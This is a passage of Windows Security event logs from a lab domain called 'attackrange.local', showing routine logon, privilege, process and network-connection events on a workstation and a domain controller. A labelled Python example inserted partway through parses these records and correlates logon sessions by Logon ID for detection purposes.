Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278870
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53911
Destination Address: 13.91.16.64
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278869
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 56153
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278868
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 56153
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278867
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 56153
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278866
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xbf4
New Process Name: C:\Windows\System32\taskhostw.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x454
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: taskhostw.exe
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278865
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0xe78
Process Name: C:\Windows\System32\winlogon.exe
Exit Status: 0x0
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=278864
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0xBD6480
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=278863
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0xBD64BF
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278862
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0xBD64BF
Process Information:
Process ID: 0x185c
Process Name: C:\Windows\System32\dwm.exe
Exit Status: 0xD00002FE
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887261
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x1B9F2C
Process Information:
Process ID: 0x175c
Process Name: C:\Windows\System32\TSTheme.exe
Exit Status: 0x0
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887260
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8F96B4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887259
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8F96B4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59EBA460-5AD1-E5F1-2935-C9E9C7858E5D}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::118f:34ac:1322:c17e
Source Port: 1274
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887258
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8F96B4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
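The 4634 and 4624 descriptions above say the two events are correlated through the Logon ID, and the 4672 that follows this 4624 carries the same Logon ID (0x8F96B4). What follows is an added example, not part of this log export and not Splunk or Microsoft tooling: a Python parser for the multi-line record format shown on this page (a "Key=Value" header through the Message= line, then "Field: Value" body lines grouped under section headers such as "Subject:" and "New Logon:") and a join of 4624, 4672 and 4634 on (host, Logon ID). The SAMPLE string is constructed from values visible on this page and trimmed to the fields the code reads; the "<section>.<field>" key scheme and the function names are this example's own.

```python
# Added example, not part of the original log export: parse Splunk-exported
# Windows Security events (multi-line "Key=Value" header, then "Field: Value"
# body, as on this page) and join 4624 / 4672 / 4634 records on Logon ID.
import re
from collections import defaultdict

TS_RE = re.compile(r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} [AP]M$")
HDR_RE = re.compile(r"^([A-Za-z]+)=(.*)$")
FLD_RE = re.compile(r"^([^:]+?):\s*(.*)$")

# Constructed sample modelled on records on this page. Like the page, it is
# not in chronological order: the 4634 comes first, RecordNumber descending.
SAMPLE = r"""
04/19/2021 06:27:48 PM
EventCode=4634
ComputerName=win-dc-982.attackrange.local
RecordNumber=887260
Message=An account was logged off.
Subject:
Account Name: WIN-DC-982$
Logon ID: 0x8F96B4
Logon Type: 3
This event is generated when a logon session is destroyed.
04/19/2021 06:27:48 PM
EventCode=4624
ComputerName=win-dc-982.attackrange.local
RecordNumber=887259
Message=An account was successfully logged on.
Subject:
Logon ID: 0x0
Logon Information:
Logon Type: 3
New Logon:
Account Name: WIN-DC-982$
Logon ID: 0x8F96B4
Network Information:
Source Network Address: fe80::118f:34ac:1322:c17e
04/19/2021 06:27:48 PM
EventCode=4672
ComputerName=win-dc-982.attackrange.local
RecordNumber=887258
Message=Special privileges assigned to new logon.
Subject:
Logon ID: 0x8F96B4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeDebugPrivilege
"""


def parse_events(text):
    """Split at timestamp lines; key body fields "<section>.<field>" because
    "Logon ID" appears under both Subject and New Logon in a 4624."""
    events, ev, section, last, in_body = [], None, "", None, False
    for line in filter(None, map(str.strip, text.splitlines())):
        if TS_RE.match(line):
            ev, section, last, in_body = {"_time": line}, "", None, False
            events.append(ev)
        elif ev is None:
            continue
        elif not in_body and HDR_RE.match(line):
            key, val = HDR_RE.match(line).groups()
            ev[key] = val
            in_body = key == "Message"  # everything after Message= is body
        elif FLD_RE.match(line):
            key, val = (s.strip() for s in FLD_RE.match(line).groups())
            if val:
                last = f"{section}.{key}" if section else key
                ev[last] = val
            else:
                section = key  # "Subject:" style section header
        elif last and last.endswith("Privileges"):
            ev[last] += " " + line  # 4672 lists one privilege per line
        # any other line is the event-description prose; ignore it
    for ev in events:
        ev["RecordNumber"] = int(ev.get("RecordNumber", 0))
    return events


def correlate_logons(events):
    """Join 4624, 4672 and 4634 on (host, Logon ID), independent of record
    order. Logon IDs are only unique between reboots of one host, so a real
    pipeline should also split the key on boot session."""
    sessions = defaultdict(dict)
    for ev in events:
        key = (ev.get("ComputerName"), ev.get("Subject.Logon ID"))
        if ev.get("EventCode") == "4624":
            sessions[(key[0], ev["New Logon.Logon ID"])].update(
                account=ev["New Logon.Account Name"],
                logon_type=int(ev["Logon Information.Logon Type"]),
                source=ev["Network Information.Source Network Address"],
                logon_time=ev["_time"])
        elif ev.get("EventCode") == "4672":
            sessions[key]["privileges"] = ev["Subject.Privileges"].split()
        elif ev.get("EventCode") == "4634":
            sessions[key]["logoff_time"] = ev["_time"]
    return dict(sessions)
```

Because the export lists records with RecordNumber descending, a logoff can appear above its logon on the page; keying on the ID rather than on sequence is what makes the join hold. On the records shown here the joined session is the DC's own machine account, WIN-DC-982$, logging on over Kerberos from its link-local address with source port 1274, the same port the adjacent 5156 events show dfsrs.exe using to reach LDAP on 389, and receiving SeDebugPrivilege and friends through the 4672. A detection built on this join would filter on logon_type == 3 together with the privilege list and then whitelist expected pairs such as this one.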
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887257
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1274
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887256
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2972
Application Name: \device\harddiskvolume1\windows\system32\dfsrs.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1274
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887255
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 2972
Application Name: \device\harddiskvolume1\windows\system32\dfsrs.exe
Network Information:
Source Address: ::
Source Port: 1274
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887254
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8F9646
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887253
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8F9646
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59EBA460-5AD1-E5F1-2935-C9E9C7858E5D}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::118f:34ac:1322:c17e
Source Port: 1273
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887252
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8F9646
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887251
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1273
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887250
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2972
Application Name: \device\harddiskvolume1\windows\system32\dfsrs.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1273
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887249
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 2972
Application Name: \device\harddiskvolume1\windows\system32\dfsrs.exe
Network Information:
Source Address: ::
Source Port: 1273
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887248
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 63965
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887247
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 904
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1272
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 135
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887246
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2972
Application Name: \device\harddiskvolume1\windows\system32\dfsrs.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1272
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 135
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887245
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 2972
Application Name: \device\harddiskvolume1\windows\system32\dfsrs.exe
Network Information:
Source Address: ::
Source Port: 1272
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887244
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 63966
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887243
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1b68
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Exit Status: 0x1
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887242
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 58319
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887241
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 55007
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887240
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 49741
Destination Address: 10.0.1.14
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887239
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b68
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887238
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 56153
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278894
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53913
Destination Address: 13.91.16.64
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278893
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 137
Destination Address: 10.0.1.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278892
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 63546
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
